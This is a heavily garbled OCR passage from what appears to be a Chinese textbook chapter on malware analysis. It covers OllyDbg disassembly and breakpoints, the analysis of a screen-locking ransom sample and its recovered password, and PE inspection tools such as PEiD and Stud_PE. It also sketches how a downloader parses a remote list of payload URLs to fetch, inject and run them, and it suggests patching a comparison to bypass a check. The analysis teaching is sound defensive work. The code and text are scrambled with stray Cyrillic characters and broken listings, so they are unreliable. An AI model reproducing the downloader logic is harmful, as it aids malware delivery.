00101 8ЕЦ 
00101 GEA 
90401920 


push еах 

push dword ptr [409920] 
push dword ptr [40991С] 
са11 00501000 


9-2 тат Ло 
实际 在 这 三 条 指令 之 前 执行 了 很 多 指令 ， 其 作用 是 初始 化 可 执行 文件 的 空间 ， 并 激 
活 主线 程 ， 这 在 前 面 章节 有 详细 介绍 。 接 下 来 会 执行 获取 命令 行 的 API 以 便 获 取 命 令 行 信 
D, KEDZE, MERER, ANBEAN UH CA WHAE 
这 里 说 一 人 Call 指令， 熟悉 VB 的 读者 可 能 会 知道 Call 指 令 ， 比 如 下 面 一 个 简短 的 TestO 
子 函 数 。 


Private Sub Form Load () 
Call Test 

End Sub 

Sub Тезт () 

MsgBox "我 是 测试 " 

End Sub 


程序 执行 后 进入 Load 函 数 执行 Call Test 指 令 ， 其 作用 就 是 激活 Test 子 函数 。 在 汇编 语 
言 中 有 详细 解释 ，Call 执行 后 程序 的 流程 就 进入 了 Test 子 函数 里 ， 上 述 汇 编 代码 则 是 进入 
了 00401000 这 个 地 址 内 ， 因 为 Call 支 持 直 接 进 入 Call 地 址 、Call 寄 存 器 。 

如 果 想 看 Call 所 指示 的 子 函数 的 话 ， 可 按 OD 的 快捷 键 F7。 这 里 直接 按 下 F7 键 跟 进 ， 
看 到 如 图 9-3 所 示 结 果 。 


9-3 FAŽ 
这 里 有 个 类 似 中 括号 的 符号 ， 括 住 的 内 容 就 是 一 段子 函数 ， 其 sub test() 
结构 如 图 9-4 所 示 。 
说 明 : 参数 是 保存 在 栈 中 的 ， 而 栈 是 通过 ss: sp 来 定位 的 。 每 
次 用 Call 调 用 子 函 数 的 时 候 ， 如 果 有 参数 必然 会 调用 push， 因 为 
push 是 压 栈 操 作 ， 意 思 是 将 数据 压 入 栈 内 。 


end sub 
Ё 9-4 УЖ 


00401000 /$ 68 30704000 push 00407030 ; 

ASCII "Hello Иог1а!", 

LF 

// 这 一 条 指令 的 意思 是 将 00407030 地 址 内 的 ASCII 字 符 "Hello World" Ж Л 1% 
00401005 |. E8 06000000 call 00401010 

// 跳 转 到 00401010 地 址 去 执行 代码 ,这 里 的 00401010 就 相当 于 Sub Test () 
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0040100А |. 83С4 04 ааа esp, 4 
/ /平衡 栈 空间 

0040100D |. 33C0 xor eax, eax 
// 清 空 寄存 器 

0040100Ғ N. СЗ retn 

/ ГБ [6] 


至 此 可 以 大 概 地 梳理 出 代码 的 反 汇 编 代码 执行 流程 。 


#include "stdafx.h" 

int main(int ағас, char* arqv[]) 
{ 

printf ("Hello,world!\n"); 

return 0; 


} 


首先 执行 主 函 数 main。 因 为 main 有 3 个 参数 ， 所 以 要 把 这 3 个 参数 事先 压 入 到 栈 空间 ， 
以 便 调 用 main 的 时 候 可 以 在 main 函 数 内 部 得 到 参数 。 

压 入 完成 后 执行 Call 函 数 ， 跳 转 到 main 主 程序 。main 程 序 首先 调 用 printf 函 数 ， 因 为 
printf 国 数 有 一 个 参数 ， 所 以 在 调用 函数 之 前 先 把 参数 压 入 到 栈 中 再 调用 ， 所 以 承 有 如 下 
的 反 汇 编 代 码 。 

00401000 /$ 68 30704000 push 00407030 ; АЗСТТ “Hello World!” ,LF 

00401005 |. E8 06000000 call 00401010 


调用 完成 之 后 需要 平衡 栈 空间 ， 由 于 这 里 的 系统 是 32 位 的 ， 所 以 参数 就 是 4。 


0040100А |. 83C4 04 ааа езр, 4 


清空 eax 寄 存 器 后 返回 ， 执 行 return 0。 这 就 是 上 述 代 码 的 执行 流程 。 
再 看 一 段 代码 。 


inelad ПЕН h” 
int main(int ағас, сһаг% агду[]) 


{ 


int а; 

scanf ("%а", &а) ; 
Е 

TEI |) 

[printf ("уа"); } 
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else 
[printf ("КМ"); } 
return 0; 


} 


从 代码 逻辑 看 ， 可 以 知道 输入 1 会 提示 成 功 ， 其 他 值 均 为 失败 。 这 里 是 最 基本 的 判 
Ër, 其 中 只 是 将 a-- 变 形 了 一 下 。 
下 面 是 上 面 代 码 的 反 汇 编 的 main 代 码 。 


00401000 /$ 51 push есх ; OllyDbgT.004080C8 

// 保 护 现场 

00401001 |. 8D4424 00 Теа eax, dword ріг [esp] 
// 获 取 int a 变量 的 地 址 保存 进 eax 寄 存 器 内 

00401005 |. 50 Push еах 

// 将 a 的 地 址 压 材 

00401006 |. 68 40804000 push 00408040 ; ASCII "за" 
// 将 字符 压 栈 

0040100B |. E8 71000000 call 00401081 

// 调 用 scanf 函 数 

00401010 |. 8B4424 08 mov eax, dword ptr [esp+8] 
// 将 输入 的 数字 保存 进 eax 寄 存 器 内 , 这 里 的 esp+8 实 际 因 为 a 地 址 是 第 二 个 参数 
00401014 |. 83C4 08 ааа езр, 8 

/ /平衡 栈 空间 

00401017 |. 48 dec eax 

// 这 里 是 eax 内 的 数据 进行 减 1 操作 

00401018 |. 83F8 01 cmp eax, 1 

// 将 eax 寄 存 器 的 内 容 与 1 进行 比较 

0040101B |. 894424 00 mov dword ptr [esp], еах 
// 将 eax 寄 存 器 里 的 内 容 保存 进 a 变 量 内 

00401017 |. 75 11 jnz short 00401032 

// 如 果 不 为 2 则 跳 转 

00401021 |. 68 38804000 push 00408038 

ПЕЛ "Ві" 字符 

00401026 |. E8 25000000 call 00401050 


// 执 行 打印 输出 函数 

0040102B |. 83C4 04 ааа езр, 4 
// 平 衡 栈 

0040102Е |. 33С0 хог eax, eax 
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// 清 零 

00401030 |. 59 рор есх 
// 弹 出 ecx 

00401031 |. СЗ retn 

/ NBE 


00401032 |> 68 30804000 push 00408030 
// 压 入 “失败 ”字符 
00401037 |. ЕЗ 14000000 са11 00401050 


// 执 行 打印 输出 函数 

0040103С |. 83C4 04 ааа езр, 4 
/ / ще: 

0040103F |. 33C0 xor eax, eax 
// 清 零 

00401041 |. 59 pop ecx 
// 弹 出 ecx 

00401042 N. СЗ retn 

/ ГЕ [E] 


提示 : 可 以 看 到 00401018 |. 83Е8 01 cmp eax，1 是 个 关键 ， 把 1 修改 为 2 试 试 ? 

下 面 来 解释 软件 调试 分 析 中 的 部 分 术语 。 

栈 是 一 组 连续 的 内 存 地 址 ， 其 大 小 为 <=2^ 操 作 系统 位 数 为 32，ss: sp 为 两 个 与 栈 有 关 
的 寄存 器 。 

> 5 为 段 寄 存 器 。 

> sp 为 偏 移 和 寄存器 。 

ss: sp 在 任意 时 刻 都 指 同 栈 项 ， 即 栈 空 间 最 大 值 加 上 一 个 字 节 。 

当 栈 为 空 的 时 候 ， 栈 里 没有 元 素 ， 也 就 没有 了 上 所谓 的 栈 顶 元 素 ， 只 能 指 回 下 一 
个 内 存单 元 。 例 如 : 将 10000H 一 1000FH 作 为 栈 ， 当 其 为 空 的 时 候 ， 其 中 ss: sp 为 
10000Н--10010Н; 当 要 压 入 元 素 时 ax=2266H， 则 执行 push ax 时 ，ss: sp 指向 的 栈 顶 为 
10000Н--10010Н-2 (这 里 的 2 可 能 是 位 数 ) ， 也 就 是 10000H 一 1000EH， 然 后 写 入 数据 ， 
高 地 址 数据 存 入 高 地 址 ， 低 地 址 数据 存 入 低地 址 。 

ah=22 存 入 1000FH，al=66 存 入 1000EH， 压 入 栈 的 时 候 sp+2， 弹 出 栈 的 时 候 sp-2。 

拿 到 样本 (这 里 的 样本 默认 为 可 执行 文件 ) 后 ， 要 用 杀 病 毒 软件 进行 查 杀 ， 然 后 得 到 
样本 的 杀毒 软件 定义 名 称 ， 接 痢 用 搜索 引擎 进行 搜索 得 询 ， 看 看 有 没有 有 用 的 信息 。 接 
着 还 要 用 PEiD 查 看 这 个 样本 的 输入 表 ， 看 都 有 什么 函数 ， 然 后 再 看 这 个 程序 是 否 是 窗口 
程序 。 

如 果 是 : 确认 这 个 窗口 是 否 是 MFC 窗 口 ， 如 果 是 就 检查 MFC 窗 口 启动 前 有 没有 和 多余 
的 操作 。 分 析 的 时 候 结 合 IDA 能 够 更 快 地 得 到 启动 函数 的 内 存 地 址 ， 然 后 可 以 对 比 MFC 启 
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动 函数 的 源 代码 。 

如 果 不 是 : 也 需要 找到 局 动 函 数 。 这 个 大 家 可 以 目 行 编写 一 些 窗口 程序 进行 分 析 。 

首先 打开 一 于 HIPS 软 件 〈( 能 够 记录 较 多 行为 的 软件 ) ， 然 后 直接 在 OllyDbg 运 行 (已 
经 对 样本 输入 表 进行 下 断 ) 。 这 一 过 只 是 粗略 地 结合 HIPS 日 志 ， 大 体 地 了 解 这 个 样本 的 
功能 ;然后 才 是 根据 这 些 零散 的 功能 做 具体 分 析 。 

例如 下 载 者 样本 ， 在 运行 后 由 于 是 下 载 者 ， 必 要 的 工作 是 验证 是 否 联网 ，〈 有 些 编 
与 者 不 验证 网 络 直接 下 载 ， 这 对 分 析 没 有 太 大 影响 ) ， 然 后 寻找 服务 器 ， 得 到 下 载 地 址 路 
径 。 如 果 是 批量 下 载 可 能 还 会 遇 到 字符 的 处 理 问 题 ， 比 如 以 下 格式 的 下 载 地 址 。 

http: \1.1.1.1\1.txt 

内 容 如 下 : 

Бир: \\1.1.1.1\1.exe，NULL， 运 行 

Бир: \1.1.1.12.DLL， 注 入 到 QQ.exe， 运 行 

http: \1.1.1.1\3.exe，NULL， 运 行 

http: \1.1.1.1\4.exe，NULL，3 秒 运行 

当 从 http: \\1.1.1.1\1.txt 获取 样本 后 ， 会 获取 到 上 述 格式 的 字符 串 。 

这 时 就 要 进行 字符 截取 ， 首 先是 回 车 待 ， 其 次 是 有 逗号 ， 然 后 定义 一 个 数组 。 这 里 只 给 
出 伪 代 码 : 

字符 串 = 获 取 网 络 地 址 字符 С “http: \1.1.1.1\1.txt”) ; 

数组 = 分 割 字 符 〈 字 符 串 ， 回 车 符 ) ; 

数组 1= 分 割 学 符 ( 数 组 ， 豆 号) ; 

则 


数组 1 [0] // 为 地 址 
数组 1 [1] // 为 指令 
数组 1 [2] // 是 直接 运行 还 是 等 待 运行 


然后 再 根据 指令 下 载 。 

上 述 是 下 载 者 在 下 载 前 对 字符 的 处 理 ， 接 下 来 介绍 OllyDbg 的 下 断 方式 。 

首先 说 明 一 下 中 文 帮助 文档 。OllyDbg 支 持 数 种 不 同类 型 的 断 点 。 

(1) 一 般 断 点 (Ordinary breakpoint) 。 将 想 中 断 的 命令 的 第 一 个 字 节 ， 用 一 个 特殊 
命令 INT3( 调 试 器 陷阱 ) 来 百代 。 在 反 汇 编 窗 口中 ， 选 中 要 设 断 点 的 指令 行 并 按 F2 键 ， 
就 可 以 设 定 一 个 此 类 型 的 断 点 ， 也 可 以 在 快捷 菜单 中 设置 。 再 次 按 下 F2 键 时 ， 断 点 将 被 
删除 。 注 意 ， 程 序 将 在 设置 断 点 指令 被 执行 之 前 中 断 。 

INT3 断 点 的 设置 数量 是 没有 限制 的 ， 当 关闭 被 调试 程序 或 者 调试 器 的 时 候 ，OllyDbsg 

将 目 动 把 这 些 断 点 保存 到 人 硬盘 中 。 永 远 不 要 试图 在 数据 段 或 者 指令 的 中 间 设 置 这 种 断 点 ， 
如 果 在 代码 段 以 外 设置 断 点 ，OllyDbg 将 会 发 出 警告 。 在 安全 选项 (Security options) 中 天 
闭 这 个 提示 ， 调 试 器 在 某 些 情况 下 会 插入 目 带 的 临时 INT3 断 点 。 

(2) ÆFA (Conditional breakpoint) ， 其 快捷 键 ShifttF2。 条 件 断 点 是 一 个 带 
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有 条 件 表达 式 的 普通 INT3 断 点 。 当 调试 器 遇 到 这 类 断 点 时 会 计算 表达 式 的 值 ， 如 果 结 
果 非 零 或 者 表达 式 无 效 ， 将 暂停 被 调试 程序 。 当 然 ， 由 条 件 为 假 的 断 点 引起 的 开销 是 非 
常 高 的 (主要 归 因 于 操作 系统 的 反应 时 间 ) 。 在 Windows NT、 和 奔腾/450 处 理 器 环境 
下 ，OllyDbg 每 秒 最 多 处 理 2500 个 条 件 为 假 的 断 点 。 条 件 断 点 的 一 个 典型 使 用 情况 就 是 在 
Windows 消 有 息 上 【比如 WM PAINT) 设置 断 点 。 为 此 ， 可 以 将 伪 变 量 MSG 同 适 当 的 参数 
说 明 联 合 使 用 ， 如 果 窗 口 被 激活 ， 可 参考 后 面 的 消息 断 点 摘 述 。 

(3) 条 件 记 录 断 点 (Conditional logging breakpoint) ， 其 快捷 键 为 ShifttF4。 条 件 记 
录 断 点 是 一 种 条 件 断 点 ， 每 当 遇 到 此 类 上 断 点 或 者 满足 条 件 时 ， 它 将 记录 已 知 函 数 表达 式 
或 参数 的 值 。 例 如 ， 可 以 在 一 些 窗口 过 程 函 数 上 ， 设 置 记录 断 点 并 列 出 对 该 函数 的 所 有 
调用 。 要 么 只 对 接收 到 的 WM_COMMAND 消 息 标 识 符 设 断 点 ， 要 么 对 创建 文件 的 函数 
(СтеаеЕйе) 设 断 点 ， 并 且 记 录 以 只 读 方式 打开 的 文件 名 等 ， 记 录 断 点 和 条 件 断 点 的 速 
度 相 当 ， 从 记录 窗口 中 浏览 上 百 条 消息 要 比 按 上 百 次 F9 键 轻松 得 多 ， 读 者 可 以 为 表达 式 选 
择 一 个 预先 定义 好 的 解释 说 明 。 

设置 通过 次 数 。 每 次 符合 暂停 条 件 时 ， 计 数 器 就 会 减 1。 如 果 通 过 次 数 在 减 1 前 ， 不 等 
于 0，OllyDbg 就 会 继续 执行 。 如 果 一 个 循环 执行 100 次 (十 进 制 ) ， 在 循环 体内 设置 一 个 
断 点 并 设置 通过 次 数 为 99 十进制) ，OllyDbg 将 会 在 最 后 一 次 执行 循环 体 时 暂停 。 

条 件 记 录 断 点 允许 传递 一 个 或 多 个 命令 给 插件 (plugins) 。 例 如 ， 读 者 需要 使 用 命令 
行 插件 改变 一 个 寄存 器 的 内 容 ， 然 后 继续 执行 程序 。 

(4) WÑ aA (Message breakpoint) 。 消 息 断 点 和 条 件 记 录 断 点 基本 相同 ，OllyDbsg 
会 自动 产生 一 个 条 件 ， 这 个 条 件 允 许 在 窗口 过 程 的 入 口 处 设置 某 些 消息 〈 比 如 WM_ 
PSINT) 断 点 ， 可 以 在 Windows 窗 口中 设置 它 。 

(5) 跟 踩 断 点 〈Trace breakpoint) 。 跟 踩 断 点 是 在 每 个 选中 命令 上 设置 的 一 种 特殊 
的 INT3 断 点 。 如 果 设 置 了 Hit 跟 踪 Chit trace) ， 断 点 会 在 命令 执行 后 移 除 并 在 该 地 址 处 做 
一 个 标记 ;如 果 使 用 的 是 Run 跟 踪 (run trace) ，OllyDbsg 会 添加 跟踪 数据 记录 并 且 仍 然 保 
持 断 点 的 激活 状态 。 

(6) 内 存 断 点 (Memory breakpoint) 。OllyDbg 每 一 时 刻 只 允许 有 一 个 内 存 断 点 。 
在 反 汇 编 窗口 、CPU 窗 口 、 数 据 窗口 中 选择 一 部 分 内 存 ， 然 后 使 用 快捷 菜单 可 以 设置 内 存 
断 点 ， 此 时 如 果 有 以 前 的 内 存 断 点 ， 将 被 目 动 误 除 。 要 么 在 内 存 访问 〈 读 、 写 、 执 行 ) 
时 中 断 ， 要 么 在 内 存 写 入 时 中 断 。 设 置 此 类 断 点 时 ，OllyDbg 将 会 改变 所 选 部 分 的 内 存 块 
属性 。 在 与 30 X86 兼容 的 处 理 器 上 ， 将 会 有 4096Byte 的 内 存 被 分 配 并 保护 起 来 ， 即 使 仅仅 
选择 了 1 个 字 节 ，OllyDbsg 也 会 将 整个 内 存 块 都 保护 起 来 ， 这 将 会 引起 大 量 的 错误 警告 ， 
请 小 心 使 用 此 类 断 点 。 茶 些 系统 函数 〈 尤 其 是 在 Windows 95/98 下 ) 在 访问 受 保护 的 内 存 
时 ， 不 但 不 会 产生 调试 事件 反而 会 造成 被 调试 程序 的 月 溃 。 

(7) WFir (Hardware breakpoint) 〈 仅 在 Windows МЕ/ЧТ/2000 FHH) „ 在 
80X86 兼 容 的 处 理 器 上 ， 人 允许 设置 4 个 硬件 断 点 ， 硬 件 断 点 和 内 存 断 点 不 同 ， 它 并 不 会 降 
低 执 行 速度 ， 但 是 最 多 只 能 履 盖 4 个 字 节 。 在 单 步 执行 或 者 跟 踩 代码 时 ，OllyDbg 能 够 使 用 
便 件 断 点 代替 INT3 断 点 。 
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(8) 内 存 访问 一 次 性 断 点 (Single-shot break on memory access) 〈 仅 在 Windows 
NT/2000 下 可 用 ) 。 对 整个 内 存 块 设置 该 类 断 点 可 以 通过 内 存 窗口 的 快捷 沫 单 〈 或 按 F2 
Ж) 来 完成 。 厦 想 捕捉 调用 或 返回 到 菏 个 模块 时 ， 该 类 断 点 就 显得 特别 有 用 。 中 断 发 生 以 
后 ， 断 点 将 被 删除 。 

(9) 暂停 Run 跟 踪 (Run пасе pause) 其 快捷 键 为 Ctrl+T。 暂 停 Run 跟 踪 是 在 每 一 步 
Вип? ж (run trace) 时 都 要 检查 的 一 个 条 件 集 ， 它 可 以 在 EIP 进 入 某 个 范围 或 超出 某 个 范 
围 时 暂停 、 茶 个 条 件 为 真 时 和 暂停、 命令 与 指定 的 模式 匹配 时 暂停 、 当 命令 可 疑 的 时 候 暂 
停 。 注 意 ， 这 一 选择 会 极 大 地 【高 达 20%) 降低 Run 跟 踪 的 速度 。 

OllyDbg 也 可 以 在 一 些 调试 事件 (debugging events) 上 暂停 程序 执行 ， 比 如 加 载 或 超 
载 DLL、 局 动 或 终止 线程 或 者 程序 发 出 调试 字符 串 的 时 候 暂 停 。 

CPU 操 作 的 对 和 象 是 寄存 器 ， 寄 和 存 器 义 有 诸多 分 类 ， 其 中 有 一 类 就 是 调试 和 测试 寄 
存 器 。 

调试 寄存 器 被 称 为 DR。(n 为 下 角 标 ) 。DR 调 试 寄存 器 总 共有 8 个 ， 从 DR。 到 DR,。 

每 个 寄存 器 的 作用 如 下 。 

> DR,—DR,: 调试 地 址 寄存 器 (保存 地 址 ) 。 


| т. “-.1----- F 
оны 2] TT OO 


> DR,—DR;: 保留 。 90009000 
> DR: 调试 寄存 器 组 状态 寄存 器 。 хуаран 


> DR: 调试 寄存 器 组 控制 寄存 器 。 а 

在 OllyDbg 中 的 调试 寄存 器 窗口 可 以 查看 寄存 器 的 09090000 
值 ， 如 图 9-5 所 示 。 图 9-5 ”调试 寄存 器 

这 里 下 一 个 硬件 访问 断 点 〈( 见 图 9-6) ， 可 以 看 到 DR 已 经 保存 了 断 点 1 指向 的 地 址 。 
而 DRs、DR; 也 出 现 了 数据 。 这 里 不 对 此 歼 述 ， 因 为 涉及 了 标志 位 ， 具 体 的 详细 解释 可 以 
参考 百度 百科 或 者 相关 书籍 。 


[| (оо 002rrco 
# Е 大 小 “中断 于 DR1 880888088 


—P DR2 0000080880 
уг Í Керм 
2 | = | maae | Araz. DR6 ЕЕЕЕВЕЕО 

з | Ea рез | | рез [R7 000760501 


-- 一 一 ШИБИР ШЕ xn . 1 п 


图 9-6 硬件 断 点 
设置 访问 断 点 之 后 ， 如 果 是 在 API 上 下 断 会 直接 定位 到 API 地 址 。 关 于 标题 栏 的 指 问 
技巧 ， 如 图 9-7 所 示 。 


K 011У1ІСЕ - 输入 法 广 入 . ехе - [CPU - ERE, БН! - mSVBVN60] 


ЖК ОЛЛУТСЕ - ЖАЙНА ехе - [CPU - ЕБЕ, ЯН - АБН: 
图 9-7 OllylCE 标 题 栏 比较 
在 图 9-7 上 方 显示 “模块 -MSVBVM60” 字 样 ， 如 果 显 示 的 并 非 是 调试 程序 的 名 称 ， 说 
明 已 经 离开 了 用 户 代码 ， 如 果 这 个 时 候 去 脱 充 ， 脱 的 并 不 是 调试 程序 的 充 。 
常用 下 断 点 的 方式 是 bp API 函 数 〈 见 图 9-8) ， 例 如 bp DeleteFileA (区 分 大 小 写 ) 。 
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程序 直接 运行 后 ， 遇 到 DeleteFile 函 数 调用 就 会 断 下 来 ， 这 里 也 有 人 会 人 bp DeleteFile W Hr 
点 。 需 要 说 明 一 下 ， 此 方式 涉及 字符 处 理 的 API 都 有 两 个 版 本 ， ANSI ("А") 和 ("W") 


的 Unicode № Ж. 

00503018 |80 00 00 е 86u61BFh|rCnhLL 2] peleteFileh 来 自 duad.00501BF 

00504028 вв 99 00 6 0812694 005853045 | СЕі1еНате = "aaa" 

00504038 вв 80 во в 0012F 698 0012F9818 

p05D5058 00 00 00 в 0812F 69C 08175Е70! 

ппорлйов во 00 во G 0812768 0009009090 | 

00508068 вв 99 вв в 8012F6ñ5] СССССССС! 

00505078! 00 00 00 Gsf 0012768 СССССССС | 

Command Бр Оеіеѓеғіед а! кзз е тул 
== = ТЕЕ тт ТТ = w — ии 


29-8 Бр API 函 数 


通过 这 个 断 点 可 以 知道 这 个 样本 目 运 行 后 会 删除 什么 。 如 果 确 定 这 个 位 置 就 是 病毒 的 
到 断 点 ， 然 后 逐个 分 析 每 一 个 语句 。 


9.2.2 


首先 打开 样本 ， 


“ 敲 竹 杠 ”病毒 分 析 


此 时 会 弹出 来 一 个 对 话 框 窗口 ， 可 以 看 到 


鼠标 被 限制 在 窗口 区 域内 ， 并 出 现 困 面 图 标 消失 等 状况 ， 如 图 


9-9 所 示 。 


使 用 OllyDbg 载 入 这 个 程序 ， 执 行 到 入 口 处 〈 见 图 9-10) 。 


š 
96401191 |. 
80401193 


80401195 


810424 761Е0! add duord ptr [esp], 1Е76 

ЕЕОВ са11 еах 

бя 00 push В 

ЕВ 26000000 call <|тр.ЕКЕННЕІ 32.ЕхіЕРғосе55> 


图 9-10 ”入 口 点 位 置 


前 面 都 是 一 些 加 载 易 语言 库 文件 的 操作 ， 很 容易 找到 入 口 。 

然后 ， 按 F7 键 跟 进 这 个 call [call eax] 语 句 ， 这 里 不 再 葡 述 了 。 由 于 只 有 一 个 按钮 ， 所 
以 跟踪 到 这 个 按钮 事件 。 

此 时 可 以 一 目 了 然 地 看 到 密码 ， 如 图 9-11 所 示 。 


E8 В3110000 
взса 18 
8945 РС 
68 0C315000 
FF75 ЕС 
ЕВ 86F7FFFF 
взса 08 
83F8 00 
вв 000060000 


ЕВ 98110000 
83C4 04 
азтп ге аа 


4. ЧР ú РЕР ЕР 


9-11 “ВРАТ” ЫЗ 
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call 9988hEF3 Ра 
ада esp, 19 да 
тоу dword ptr [ebp-4] eax Но 
push 00406310C ASCII “woz 
push dword ptr [ebp-4] м 
са11 0089409 = Ф 
add esp, 8 

cnp eax, Ü 

mou eax, 9 

sete al 

тоу dword ptr [ebp-8], eax 

тоу ebx, dword ptr [ерр-а] 

test ebx, ebx 

je short 00489074 

push ebx 

call B048AF 05 比较 密码 
add esp, 4 

етп пиле пере Ггоһљ-9 1 а 


| 


СВ” та 


图 9-9 


ExitCode = 8 
ExitProcess 
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这 里 如 果 中 毒 的 话 ， 可 以 直接 再 运行 这 个 程序 ， 然 后 输入 wozhenxiangzisha 就 可 以 了 。 


9.2.3 重要 辅助 工具 


当然 ， 要 想 更 加 透彻 地 分 析 病 毒 ， 仅 仅 使 用 OD 是 不 够 的 ， 本 节 将 介绍 一 些 常 用 的 病 
毒 分 析 工 具 ， 便 于 读者 从 行为 、 部 分 源码 上 理解 病毒 的 原理 ， 以 及 杀毒 软件 是 如 何 有 效 防 
治 病 毒 入 侵 计 算 机 的 原理 。 


1. PEiD 一 一 查 壳 工 具 

PEID 〈 见 图 9-12) 在 本 书 中 多 次 提 到 ， 是 一 于 非常 优秀 的 针对 PE 文件 的 查 充 软件 ， 
病毒 通过 加 过 一 方面 为 了 达到 免 杀 的 目的 ， 另 一 方面 也 是 为 了 保护 代码 不 被 轻易 地 破解 分 
析 。 di 


"Е PEiD ч0. 95 


File: {C:\Documents and Settingstadmin В fF аза.ехе 


Entrypoint: 00020Е70 
File Offset: 00006270 
Linker Info: 6.0 


EP Section: [PXI [>] 
First Bytes: Б0,ВЕ,00,80 ша 


Мо thing Found * 
Multi Scan | Task Wiewer | Options | | About | = 


№ Stay оп top 


图 9-12 ”PEiD 使 用 界面 
图 9-13 所 示 的 是 一 个 加 这 的 文件 。 很 显然 ， 程 序 代码 通过 加 密 以 后 ， 第 一 行 显示 出 来 
的 并 不 是 程序 入 口 点 函数 所 代表 的 基地 址 ， 同 时 也 无 法 从 代码 中 读 出 有 用 的 信息 。 


< O11yICE 一 P ааа. ехе — [CPU 一 主线 程 ， 模块 — ВЯ ааа] 
-ЕгІТ SEV 调试 四 ) ЗФ) AAD СЕ 帮助 H) 


90428000 
dword ptr [esi+FFFD9088] 


е51, 
edi, 
edi 
ebp, 
ебх, 
еах, 
еах 
еѕр, ебх 


80420Е71 
80Ң2рЕ?б 
0042DE7C 
909420Е?7 
060642DE7F 


esp L | 
dword ptr [esp-3E88] 
eax 


80Ң2рЕ89 


8ӨҢ2рЕВВ 
99420ЕЗ О 
8642DES8E 
8ӨҢ2рЕВҒЕ 


99420Е?З 8 | . 


0042DE95 


B042DE9F 


B042DEAQ| . 


80842DEA3 


short В8420ЕВ8В 
есі 

есі 

ebx 

2B529 

edi 

ebx, 4 


ebx 
ЕС 
esi 


ebx, 4 
ebx 


图 9-13 加 壳 文件 


进行 脱 壳 处 理 之 后 ， 就 能 很 明显 地 看 到 代码 的 真实 面目 ， 代 码 第 一 行 也 恢复 为 正常 的 
入 口 点 函数 ， 同 时 从 注释 中 可 以 看 到 该 程序 调用 了 MessageBoxA 函 数 ， 如 图 9-14 所 示 。 
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к 011уУІСЕ - ааа. ехе 一 [CPU - 主线 程 ， 模 块 — ааа] 

图 | 文件 下) 查看 (Y) МФ МФ лт ПФ #800 

Па ЕСС >н ын ә мвемтмнсткивеае ет? 
90491918 

00101011 || . > ВВЕС тоу ebp, esp 

00101013 || 。 83EC 40 sub esp, 48 

99491016 |. 53 push ebx 

0950108171]. 56 push е51 

00101018 |. 57 push edi 

00501019 ||. 8070 СО 1еа edi, dword ptr [ebp-40] 

0050101C | . В9 10000000 | поч есх, 19 

0021010211]. В8 СССССССС | поч eax, СССССССС 

0010180826 |. ЕЗ:АВ rep stos dword ptr es:[edi] 

0901018928 || . 8BFS mou esi, esp 

90401021 ||. ба өө push 0 Style = МВ ОК| МВ APPLMODAL 
0049102С|| . 68 30204200 | push 00422030 Title = "yes" 
883010311). 68 28204200 | push 00422028 Text = “haha” 
0010108036 | . ба ӨӨ push 9 h0wner = NULL 
903091038 || . FF15 АСА2420!са11 dword ptr [<&USER32 .МеззадеВохй] .Ме55адеВохй 

00101 03Е || . ЗВЕЦ спр е51, esp 

00401050 |. E8 58000000 |са11 _ спкевр 

001010255 ||. 8BF4 mou esi, esp 

0001057 | . ба ӨӨ push 9 Style = НВ ОК| МВ ВРРСМООЯГ 
99481849 |. 68 242804200 push 00422024 Title = "по" 

0040104E|| - 68 1C204200 push 00422801C Text = "уауа" 
00401053 1] . ба 98 push 9 hOwner = NULL 

00401 055 FF15 ЯСА2428! са11 dword ptr [<&USER32 .МеззадеВохй! СМеѕѕадцеВохӣ 


89-14 ”文件 脱 壳 后 
人 简单 地 说 。PE 文 件 就 是 Windows 平 台 上 的 可 执行 程序 ， 包 括 exe、dll、com、sys、ocx 
等 各 种 文件 。 
既然 作用 于 计算 机 的 病毒 都 是 PE 文件 格式 ， 那 么 也 可 以 使 用 专门 分 析 PE 文 件 的 软件 
来 分 析 病 毒 ， 如 Stud PE。 


2. Stud_PE 


在 Stud РЕ 〈 见 图 9-1$) 的 “在 16 进 位 编辑 器 中 视图 文件 头 树 ”中 的 “数据 Н” В 
后 ， 可 以 清楚 地 看 到 数据 是 被 加 了 UPX 壳 〈 见 图 9-16) 。 


‚; Ѕ+па РЕ 编 辐 - 7 ЭР ааа ехе” — 132 他 应 用 程序 ] < 
vF з) TAT HAY 


E:Vdocuments and settingsadmin ЕЛ = aaaexe 4 44 4 4 4 4 í 4 í í í í í í 
Ш|> 文件 头 |у Dos | ова | wam |= wi | ожа | 进程 |* 选 项 | 
зона GRISHA) жы _ 目录 

| ооо2рето | 
[00006270 ADOS (实际 地 址 ) 
| 00400000 ве 
[00030000 ве 


БИДЕ 大 小 实际 地 址 


址 
[和 输入 表 _][ 00022000 | ooooooE0 | о0006Е0О 


[ ”输出 表 |100000000 「 5oooooo0 [ 00000000 


FHAR: ва? вв шн ее x 


[зонах [++ |Госооосоо [00000000 [`00000000 
在 16 进 位 狂 特 器 中 视图 文件 头 树 ТЕСТЕ 


「 ooool000 зе [P]: 
Г 00000000 ”核验 和 E] 
=== 


— 


dr rr ы. ав 


ЯНУ esa PE 论坛 < ял 


Stud РЕ 8444: DOS XPA 4 
| << | >> | 复 件 aaa.exe ЧЕ: 0х00000000 区 块 大 少 : 0x300 


^ 


alla 


|<. 


29-15 ”Stud_PE 功 能 图 
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зов “病毒 不 神秘 / „ША 


00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 

00 оо оо 00 оо оо оо оо оо оо оо оо 00 оо оо ОО 

00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 оо | 
00 00 00 00 00 00 00 00 | .. UPXO. 


图 9-16 ”UPX 壳 
打开 Stud_PE 主 界面 的 函数 选项 ， 可 以 清楚 地 了 解 到 该 程序 调用 的 函数 类 型 〈 见 医 
9-17) 


Stud РЕ їн: “ 复 件 ааа. ехе“ - [32 AMME ] 
УНР 编辑 区 ) ТАС) $ 


\аоситепіѕ and settings\admin 4 {+ ааа, exe 


> 文件 头 | ъпо | оэ “Яғ |на |115 
-输入 函数 


MessageBoxA оға: rva2lat: 00027058 


图 9-17 ”函数 分 析 界 面 
其 中 KERNEL32.DLEL 装 载 的 是 程序 的 winmain 入 口 函数 ，USER32.DLL 装 载 则 是 
MessageBoxA， 这 可 是 在 加 充 的 情况 下 就 能 看 到 的 ， 因 此 一 于 分 析 PE 文 件 的 软件 在 加 充 程 
序 函 数 的 分 析 上 是 优 于 调试 器 的 ， 类 似 的 软件 还 有 PEview。 
当然 ， 也 有 专门 分 析 程 序 调用 函数 的 武器 一 一 Dependency Walker ( 见 图 9-18) 。 


Dependency Walker - [9 fF ааа. ехе] 
